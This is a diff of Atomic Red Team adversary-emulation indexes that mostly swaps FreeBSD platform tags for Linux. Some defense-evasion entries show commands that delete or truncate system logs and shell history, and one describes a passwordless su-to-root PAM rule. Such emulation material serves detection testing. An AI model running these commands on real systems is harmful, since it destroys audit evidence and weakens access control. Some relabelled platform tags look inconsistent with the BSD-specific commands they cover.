- Atomic Test #5: Hidden files [macos]
|
||||
- Atomic Test #6: Hide a Directory [macos]
|
||||
@@ -203,15 +203,15 @@
|
||||
- T1163 Rc.common [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
|
||||
- Atomic Test #1: Cron - Replace crontab with referenced file [freebsd, macos, linux]
|
||||
- Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos]
|
||||
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
|
||||
- T1165 Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1162 Login Item [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1176 Browser Extensions](../../T1176/T1176.md)
|
||||
- Atomic Test #1: Chrome/Chromium (Developer Mode) [freebsd, linux, windows, macos]
|
||||
- Atomic Test #2: Chrome/Chromium (Chrome Web Store) [freebsd, linux, windows, macos]
|
||||
- Atomic Test #3: Firefox [freebsd, linux, windows, macos]
|
||||
- Atomic Test #1: Chrome/Chromium (Developer Mode) [linux, windows, macos]
|
||||
- Atomic Test #2: Chrome/Chromium (Chrome Web Store) [linux, windows, macos]
|
||||
- Atomic Test #3: Firefox [linux, windows, macos]
|
||||
- Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
|
||||
- [T1037.002 Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md)
|
||||
- Atomic Test #1: Logon Scripts - Mac [macos]
|
||||
@@ -233,7 +233,7 @@
|
||||
- T1164 Re-opened Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md)
|
||||
- Atomic Test #1: Modify SSH Authorized Keys [freebsd, macos, linux]
|
||||
- Atomic Test #1: Modify SSH Authorized Keys [linux, macos]
|
||||
- T1215 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1136.002 Create Account: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -323,7 +323,7 @@
|
||||
- Atomic Test #4: Tor Proxy Usage - MacOS [macos]
|
||||
- T1001 Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1571 Non-Standard Port](../../T1571/T1571.md)
|
||||
- Atomic Test #2: Testing usage of uncommonly used port [freebsd, linux, macos]
|
||||
- Atomic Test #2: Testing usage of uncommonly used port [linux, macos]
|
||||
- T1573 Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -334,19 +334,19 @@
|
||||
- T1132 Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1071.001 Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md)
|
||||
- Atomic Test #3: Malicious User Agents - Nix [freebsd, linux, macos]
|
||||
- Atomic Test #3: Malicious User Agents - Nix [linux, macos]
|
||||
- [T1105 Ingress Tool Transfer](../../T1105/T1105.md)
|
||||
- Atomic Test #1: rsync remote file copy (push) [freebsd, linux, macos]
|
||||
- Atomic Test #2: rsync remote file copy (pull) [freebsd, linux, macos]
|
||||
- Atomic Test #3: scp remote file copy (push) [freebsd, linux, macos]
|
||||
- Atomic Test #4: scp remote file copy (pull) [freebsd, linux, macos]
|
||||
- Atomic Test #5: sftp remote file copy (push) [freebsd, linux, macos]
|
||||
- Atomic Test #6: sftp remote file copy (pull) [freebsd, linux, macos]
|
||||
- Atomic Test #14: whois file download [freebsd, linux, macos]
|
||||
- Atomic Test #1: rsync remote file copy (push) [linux, macos]
|
||||
- Atomic Test #2: rsync remote file copy (pull) [linux, macos]
|
||||
- Atomic Test #3: scp remote file copy (push) [linux, macos]
|
||||
- Atomic Test #4: scp remote file copy (pull) [linux, macos]
|
||||
- Atomic Test #5: sftp remote file copy (push) [linux, macos]
|
||||
- Atomic Test #6: sftp remote file copy (pull) [linux, macos]
|
||||
- Atomic Test #14: whois file download [linux, macos]
|
||||
- T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1090.001 Proxy: Internal Proxy](../../T1090.001/T1090.001.md)
|
||||
- Atomic Test #1: Connection Proxy [freebsd, macos, linux]
|
||||
- Atomic Test #1: Connection Proxy [linux, macos]
|
||||
- Atomic Test #2: Connection Proxy for macOS UI [macos]
|
||||
- T1094 Custom Command and Control Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1102.001 Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -356,9 +356,9 @@
|
||||
# collection
|
||||
- [T1560.001 Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md)
|
||||
- Atomic Test #5: Data Compressed - nix - zip [linux, macos]
|
||||
- Atomic Test #6: Data Compressed - nix - gzip Single File [freebsd, linux, macos]
|
||||
- Atomic Test #7: Data Compressed - nix - tar Folder or File [freebsd, linux, macos]
|
||||
- Atomic Test #8: Data Encrypted with zip and gpg symmetric [freebsd, macos, linux]
|
||||
- Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos]
|
||||
- Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos]
|
||||
- Atomic Test #8: Data Encrypted with zip and gpg symmetric [linux, macos]
|
||||
- Atomic Test #9: Encrypts collected data with AES-256 and Base64 [linux, macos]
|
||||
- [T1113 Screen Capture](../../T1113/T1113.md)
|
||||
- Atomic Test #1: Screencapture [macos]
|
||||
@@ -422,7 +422,7 @@
|
||||
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1206 Sudo Caching [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
|
||||
- Atomic Test #1: Cron - Replace crontab with referenced file [freebsd, macos, linux]
|
||||
- Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos]
|
||||
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
|
||||
- T1165 Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -518,7 +518,7 @@
|
||||
- Atomic Test #14: Simulating Access to Chrome Login Data - MacOS [macos]
|
||||
- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1552.004 Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md)
|
||||
- Atomic Test #2: Discover Private SSH Keys [freebsd, macos, linux]
|
||||
- Atomic Test #2: Discover Private SSH Keys [linux, macos]
|
||||
- Atomic Test #5: Copy Private SSH Keys with rsync [macos, linux]
|
||||
- Atomic Test #7: Copy the users GnuPG directory with rsync [macos, linux]
|
||||
- T1110.003 Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -527,10 +527,10 @@
|
||||
- [T1552.003 Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md)
|
||||
- Atomic Test #1: Search Through Bash History [linux, macos]
|
||||
- [T1552.001 Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md)
|
||||
- Atomic Test #1: Find AWS credentials [freebsd, macos, linux]
|
||||
- Atomic Test #1: Find AWS credentials [macos, linux]
|
||||
- Atomic Test #2: Extract Browser and System credentials with LaZagne [macos]
|
||||
- Atomic Test #3: Extract passwords with grep [freebsd, macos, linux]
|
||||
- Atomic Test #6: Find and Access Github Credentials [freebsd, macos, linux]
|
||||
- Atomic Test #3: Extract passwords with grep [linux, macos]
|
||||
- Atomic Test #6: Find and Access Github Credentials [linux, macos]
|
||||
- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1141 Input Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -552,17 +552,17 @@
|
||||
|
||||
# discovery
|
||||
- [T1033 System Owner/User Discovery](../../T1033/T1033.md)
|
||||
- Atomic Test #2: System Owner/User Discovery [freebsd, linux, macos]
|
||||
- Atomic Test #2: System Owner/User Discovery [linux, macos]
|
||||
- T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1652 Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1087.002 Account Discovery: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1063 Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1087.001 Account Discovery: Local Account](../../T1087.001/T1087.001.md)
|
||||
- Atomic Test #2: View sudoers access [freebsd, linux, macos]
|
||||
- Atomic Test #3: View accounts with UID 0 [freebsd, linux, macos]
|
||||
- Atomic Test #4: List opened files by user [freebsd, linux, macos]
|
||||
- Atomic Test #7: Enumerate users and groups [freebsd, linux, macos]
|
||||
- Atomic Test #2: View sudoers access [linux, macos]
|
||||
- Atomic Test #3: View accounts with UID 0 [linux, macos]
|
||||
- Atomic Test #4: List opened files by user [linux, macos]
|
||||
- Atomic Test #7: Enumerate users and groups [linux, macos]
|
||||
- Atomic Test #8: Enumerate users and groups [macos]
|
||||
- [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
|
||||
- Atomic Test #4: Detect Virtualization Environment (MacOS) [macos]
|
||||
@@ -577,9 +577,9 @@
|
||||
- T1120 Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1082 System Information Discovery](../../T1082/T1082.md)
|
||||
- Atomic Test #2: System Information Discovery [macos]
|
||||
- Atomic Test #3: List OS Information [freebsd, linux, macos]
|
||||
- Atomic Test #8: Hostname Discovery [freebsd, linux, macos]
|
||||
- Atomic Test #12: Environment variables discovery on freebsd, macos and linux [freebsd, macos, linux]
|
||||
- Atomic Test #3: List OS Information [linux, macos]
|
||||
- Atomic Test #8: Hostname Discovery [linux, macos]
|
||||
- Atomic Test #12: Environment variables discovery on freebsd, macos and linux [linux, macos]
|
||||
- Atomic Test #13: Show System Integrity Protection status (MacOS) [macos]
|
||||
- T1010 Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -592,16 +592,16 @@
|
||||
- Atomic Test #9: List macOS Firewall Rules [macos]
|
||||
- T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1083 File and Directory Discovery](../../T1083/T1083.md)
|
||||
- Atomic Test #3: Nix File and Directory Discovery [freebsd, macos, linux]
|
||||
- Atomic Test #4: Nix File and Directory Discovery 2 [freebsd, macos, linux]
|
||||
- Atomic Test #3: Nix File and Directory Discovery [linux, macos]
|
||||
- Atomic Test #4: Nix File and Directory Discovery 2 [linux, macos]
|
||||
- [T1049 System Network Connections Discovery](../../T1049/T1049.md)
|
||||
- Atomic Test #3: System Network Connections Discovery FreeBSD, Linux & MacOS [freebsd, linux, macos]
|
||||
- Atomic Test #3: System Network Connections Discovery FreeBSD, Linux & MacOS [linux, macos]
|
||||
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1057 Process Discovery](../../T1057/T1057.md)
|
||||
- Atomic Test #1: Process Discovery - ps [freebsd, linux, macos]
|
||||
- Atomic Test #1: Process Discovery - ps [linux, macos]
|
||||
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1069.001 Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md)
|
||||
- Atomic Test #1: Permission Groups Discovery (Local) [freebsd, macos, linux]
|
||||
- Atomic Test #1: Permission Groups Discovery (Local) [linux, macos]
|
||||
- [T1201 Password Policy Discovery](../../T1201/T1201.md)
|
||||
- Atomic Test #8: Examine password policy - macOS [macos]
|
||||
- T1614.001 System Location Discovery: System Language Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -609,8 +609,8 @@
|
||||
- [T1518.001 Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md)
|
||||
- Atomic Test #3: Security Software Discovery - ps (macOS) [macos]
|
||||
- [T1018 Remote System Discovery](../../T1018/T1018.md)
|
||||
- Atomic Test #6: Remote System Discovery - arp nix [freebsd, linux, macos]
|
||||
- Atomic Test #7: Remote System Discovery - sweep [freebsd, linux, macos]
|
||||
- Atomic Test #6: Remote System Discovery - arp nix [linux, macos]
|
||||
- Atomic Test #7: Remote System Discovery - sweep [linux, macos]
|
||||
- [T1046 Network Service Discovery](../../T1046/T1046.md)
|
||||
- Atomic Test #1: Port Scan [linux, macos]
|
||||
- Atomic Test #2: Port Scan Nmap [linux, macos]
|
||||
@@ -648,24 +648,24 @@
|
||||
- T1494 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1493 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1496 Resource Hijacking](../../T1496/T1496.md)
|
||||
- Atomic Test #1: FreeBSD/macOS/Linux - Simulate CPU Load with Yes [freebsd, macos, linux]
|
||||
- Atomic Test #1: FreeBSD/macOS/Linux - Simulate CPU Load with Yes [linux, macos]
|
||||
- T1565.002 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1485 Data Destruction](../../T1485/T1485.md)
|
||||
- Atomic Test #2: FreeBSD/macOS/Linux - Overwrite file with DD [freebsd, linux, macos]
|
||||
- Atomic Test #2: FreeBSD/macOS/Linux - Overwrite file with DD [linux, macos]
|
||||
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1495 Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1490 Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1561.001 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1529 System Shutdown/Reboot](../../T1529/T1529.md)
|
||||
- Atomic Test #3: Restart System via `shutdown` - FreeBSD/macOS/Linux [freebsd, macos, linux]
|
||||
- Atomic Test #4: Shutdown System via `shutdown` - FreeBSD/macOS/Linux [freebsd, macos, linux]
|
||||
- Atomic Test #5: Restart System via `reboot` - FreeBSD/macOS/Linux [freebsd, macos, linux]
|
||||
- Atomic Test #3: Restart System via `shutdown` - FreeBSD/macOS/Linux [linux, macos]
|
||||
- Atomic Test #4: Shutdown System via `shutdown` - FreeBSD/macOS/Linux [linux, macos]
|
||||
- Atomic Test #5: Restart System via `reboot` - FreeBSD/macOS/Linux [linux, macos]
|
||||
|
||||
# execution
|
||||
- T1059.007 Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1204.002 User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
|
||||
- Atomic Test #1: Cron - Replace crontab with referenced file [freebsd, macos, linux]
|
||||
- Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos]
|
||||
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
|
||||
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1059.002 Command and Scripting Interpreter: AppleScript](../../T1059.002/T1059.002.md)
|
||||
@@ -684,8 +684,8 @@
|
||||
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1061 Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1059.004 Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md)
|
||||
- Atomic Test #1: Create and Execute Bash Shell Script [freebsd, linux, macos]
|
||||
- Atomic Test #2: Command-Line Interface [freebsd, linux, macos]
|
||||
- Atomic Test #1: Create and Execute Bash Shell Script [linux, macos]
|
||||
- Atomic Test #2: Command-Line Interface [linux, macos]
|
||||
- T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1154 Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -733,19 +733,19 @@
|
||||
- T1048.001 Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md)
|
||||
- Atomic Test #2: Exfiltrate data HTTPS using curl freebsd,linux or macos [macos, linux, freebsd]
|
||||
- Atomic Test #2: Exfiltrate data HTTPS using curl freebsd,linux or macos [macos, linux]
|
||||
- T1041 Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1048 Exfiltration Over Alternative Protocol](../../T1048/T1048.md)
|
||||
- Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux, freebsd]
|
||||
- Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux, freebsd]
|
||||
- Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux]
|
||||
- Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux]
|
||||
- T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1002 Data Compressed [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1567.003 Exfiltration Over Web Service: Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1030 Data Transfer Size Limits](../../T1030/T1030.md)
|
||||
- Atomic Test #1: Data Transfer Size Limits [macos, linux, freebsd]
|
||||
- Atomic Test #1: Data Transfer Size Limits [macos, linux]
|
||||
- T1022 Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md)
|
||||
- Atomic Test #1: Exfiltration Over Alternative Protocol - HTTP [macos, linux, freebsd]
|
||||
- Atomic Test #1: Exfiltration Over Alternative Protocol - HTTP [macos, linux]
|
||||
|
||||
|
||||
@@ -968,9 +968,9 @@
|
||||
- Atomic Test #1: Simulate Patching termsrv.dll [windows]
|
||||
- Atomic Test #2: Modify Terminal Services DLL Path [windows]
|
||||
- [T1176 Browser Extensions](../../T1176/T1176.md)
|
||||
- Atomic Test #1: Chrome/Chromium (Developer Mode) [freebsd, linux, windows, macos]
|
||||
- Atomic Test #2: Chrome/Chromium (Chrome Web Store) [freebsd, linux, windows, macos]
|
||||
- Atomic Test #3: Firefox [freebsd, linux, windows, macos]
|
||||
- Atomic Test #1: Chrome/Chromium (Developer Mode) [linux, windows, macos]
|
||||
- Atomic Test #2: Chrome/Chromium (Chrome Web Store) [linux, windows, macos]
|
||||
- Atomic Test #3: Firefox [linux, windows, macos]
|
||||
- Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
|
||||
- Atomic Test #5: Google Chrome Load Unpacked Extension With Command Line [windows]
|
||||
- T1058 Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
|
||||
+140
-251
@@ -1037,7 +1037,7 @@ defense-evasion:
|
||||
|
||||
Upon successful execution, this test will insert a rule that allows every user to su to root without a password.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
path_to_pam_conf:
|
||||
description: PAM config file to modify.
|
||||
@@ -1311,9 +1311,8 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
numeric_mode:
|
||||
description: Specified numeric mode value
|
||||
@@ -1335,9 +1334,8 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
symbolic_mode:
|
||||
description: Specified symbolic mode value
|
||||
@@ -1359,9 +1357,8 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
numeric_mode:
|
||||
description: Specified numeric mode value
|
||||
@@ -1383,9 +1380,8 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
symbolic_mode:
|
||||
description: Specified symbolic mode value
|
||||
@@ -1460,9 +1456,8 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
owner:
|
||||
description: Username of desired owner
|
||||
@@ -1523,7 +1518,7 @@ defense-evasion:
|
||||
Remove's a file's `immutable` attribute using `chflags`.
|
||||
This technique was used by the threat actor Rocke during the compromise of Linux web servers.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
file_to_modify:
|
||||
description: Path of the file
|
||||
@@ -1572,7 +1567,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
source_file:
|
||||
description: Path of c source file
|
||||
@@ -1636,7 +1631,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
source_file:
|
||||
description: Path of c source file
|
||||
@@ -3164,7 +3159,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if sudo is installed.
|
||||
@@ -3203,7 +3198,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if sudo is installed.
|
||||
@@ -3242,7 +3237,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if sudo is installed.
|
||||
@@ -3852,7 +3847,6 @@ defense-evasion:
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
- freebsd
|
||||
input_arguments:
|
||||
test_message:
|
||||
description: Test message to echo out to the screen
|
||||
@@ -4787,7 +4781,7 @@ defense-evasion:
|
||||
Detects execution in a virtualized environment.
|
||||
At boot, dmesg stores a log if a hypervisor is detected.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
@@ -4938,7 +4932,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
rm -rf /var/log/messages
|
||||
@@ -4997,7 +4991,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: "truncate -s 0 /var/log/messages #size parameter shorthand\ntruncate
|
||||
--size=0 /var/log/security #size parameter \n"
|
||||
@@ -5042,7 +5036,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
cat /dev/null > /var/log/messages #truncating the file to zero bytes
|
||||
@@ -5116,7 +5110,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'echo '''' > /var/log/messages
|
||||
|
||||
@@ -5172,7 +5166,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'unlink /var/log/messages
|
||||
|
||||
@@ -7414,7 +7408,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'rm ~/.sh_history
|
||||
|
||||
@@ -7438,7 +7432,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'echo "" > ~/.sh_history
|
||||
|
||||
@@ -7463,7 +7457,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'cat /dev/null > ~/.sh_history
|
||||
|
||||
@@ -7488,7 +7482,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'ln -sf /dev/null ~/.sh_history
|
||||
|
||||
@@ -7512,7 +7506,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'truncate -s0 ~/.sh_history
|
||||
|
||||
@@ -7540,7 +7534,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
unset HISTFILE
|
||||
@@ -7618,7 +7612,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependencies:
|
||||
- description: 'Install sshpass and create user account used for excuting
|
||||
|
||||
@@ -7961,7 +7955,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
